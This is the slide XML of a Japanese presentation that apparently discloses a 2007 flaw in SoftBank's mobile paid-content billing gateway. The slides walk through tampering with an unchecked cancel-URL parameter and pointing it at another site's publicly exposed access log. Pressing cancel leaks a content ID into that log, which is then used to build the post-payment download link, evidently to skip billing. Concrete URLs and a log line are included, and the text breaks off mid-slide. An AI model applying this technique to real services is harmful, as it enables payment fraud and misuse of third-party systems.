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3" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="261" r:id="rId7"/>
    <p:sldId id="26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186"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4FAE71AB-92E7-41AF-A7F8-8E0BE16669BA}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" smtClean="0"/>
              <a:t>2015/8/27</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61CAAC88-3D4E-437F-851E-059C896F69BE}"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4FAE71AB-92E7-41AF-A7F8-8E0BE16669BA}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" smtClean="0"/>
              <a:t>2015/8/27</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4FAE71AB-92E7-41AF-A7F8-8E0BE16669BA}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" smtClean="0"/>
              <a:t>2015/8/27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61CAAC88-3D4E-437F-851E-059C896F69BE}"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4FAE71AB-92E7-41AF-A7F8-8E0BE16669BA}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" smtClean="0"/>
              <a:t>2015/8/27</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61CAAC88-3D4E-437F-851E-059C896F69BE}"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FAE71AB-92E7-41AF-A7F8-8E0BE16669BA}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" smtClean="0"/>
              <a:t>2015/8/27</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CAAC88-3D4E-437F-851E-059C896F69B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smtClean="0"/>
              <a:t>Softbank </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>有料コンテンツ</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>課金ゲートウェイの脆弱性</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="サブタイトル 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>佐藤　昇</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>一郎</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2807746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一例</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>http://jphone/CONFON/jskycmi/ARK2HxiMArb2QK1gDPj1yU/wJ1fUDxjZu2KJ0x/HKMwWnAQShZgW2BYShRKICBYYFhKBEofoFrgWEomgMDAwMDAw/CONFON?nl=http://j-sl.******.ne.jp/pay_enter.cgi&amp;aplno=80&amp;regino=1&amp;cl=http://j-sl.******.ne.jp/free.cgi&amp;menu=dl_info&amp;aplno=80&amp;regino=1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>これはソフトバンクの携帯電話有料オンラインコンテンツ（着うたや、ゲーム）のダウンロード元、課金前画面のリンクである。（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>2007</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>年発見当時）（参考：添付画像</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>のパラメーター　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0"/>
              <a:t>nl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>　は</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>OK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>ボタン押下で課金に同意後、コンテンツ提供元のダウンロード画面に移動するリンクを表している。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>同様に、パラメーター　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>cl=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>　はキャンセルボタン押下時の遷移先ページを表している。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0"/>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>パラメーターの内容は、書き換えるとエラーが出現して表示不可であったが、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>cl=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>を書き換える場合だと正常に表示できる</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>ため（チェック機構の不備）、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>この部分を重点的に調べる事で当時の私は解析の一助になると考えた。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="タイトル 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>1. Softbank </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>課金ゲートウェイ</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="58685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pic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74764" y="1481138"/>
            <a:ext cx="3394471" cy="452596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t>添付</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>画像</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="テキスト ボックス 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1835696" y="6237312"/>
            <a:ext cx="5256584" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>一例の</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>にアクセスした際の端末表示画面</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2584439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7500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0"/>
              <a:t>nl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>=http://j-sl.success.ne.jp/pay_enter.cgi&amp;aplno=80&amp;regino=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>このリンクに端末でそのままアクセスしても（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0"/>
              <a:t>pay_enter.cgi&amp;aplno</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>=~~</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>の</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>の部分は</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>へと</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>置き換える）、コンテンツが表示されることはないため、実際の</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>OK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>クリック時</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>には別に渡されるパラメーターがあるのではないかと考えた。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>そこで、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>Access.log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>を（意図してのものなの</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>か</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>そうでないのか定かではない）公開しているウェブサイトを</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>Google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>検索</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>パラメーター </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0"/>
              <a:t>inurl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>:“access.log”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>　等で探し出し、</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>http://jphone/CONFON/jskycmi/ARK2HxiMArb2QK1gDPj1yU/wJ1fUDxjZu2KJ0x/HKMwWnAQShZgW2BYShRKICBYYFhKBEofoFrgWEomgMDAwMDAw/CONFON?nl=http://j-sl.******.ne.jp/pay_enter.cgi&amp;aplno=80&amp;regino=1&amp;cl= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://redl**.com/logs/access.log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>と書き換え、上記画面でキャンセルボタンを押した。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="タイトル 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>2. ?c</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>l=</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>パラメーターと</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>access.log</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>の挿入</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="330241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r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>すると、</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>123.108.239.238 - - [27/Aug/2015:03:15:54 -0700] "GET /logs/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ja-JP" dirty="0" err="1" smtClean="0"/>
              <a:t>access.log?sid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>=B6V8&amp;reg=2 HTTP/1.1" 200 193016 "-" "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ja-JP" dirty="0" err="1" smtClean="0"/>
              <a:t>SoftBank</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>/1.0/***SH/SHJ001 Browser/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ja-JP" dirty="0" err="1" smtClean="0"/>
              <a:t>NetFront</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>/3.5 Profile/MIDP-2.0 Configuration/CLDC-1.1" "redlug.com“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>と</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>いう一列がアクセスログ内に記録されていた。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>先程はキャンセルボタン押下時の処理のため、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ja-JP" dirty="0" err="1" smtClean="0"/>
              <a:t>access.log?sid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>=B6V8&amp;reg=2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>　を元に実際のリンクを推定すると、</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>http://j-sl.success.ne.jp/free.cgi?menu=dl_info&amp;aplno=80&amp;regino=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ja-JP" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=B6V8&amp;reg=2 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>となる。（赤文字は追加部分）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>=**** </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>はコンテンツ</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>業者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>や価格を含む情報を</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>識別</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>する一意の</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0"/>
              <a:t>reg</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>=1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>で課金</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>OK</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0"/>
              <a:t>reg</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>=2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>で課金キャンセル</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>を示す。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="タイトル 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>3. Accsess.log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>に記録された</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>パラメーター</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="167656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smtClean="0"/>
              <a:t>以上の内容を踏まえ、</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0"/>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>パラメーター内にある</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>に、判明した</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ja-JP" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=B6V8&amp;reg=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>の追加パラメーターを付加し、</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>http://j-sl.success.ne.jp/pay_enter.cgi?aplno=80&amp;regino=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
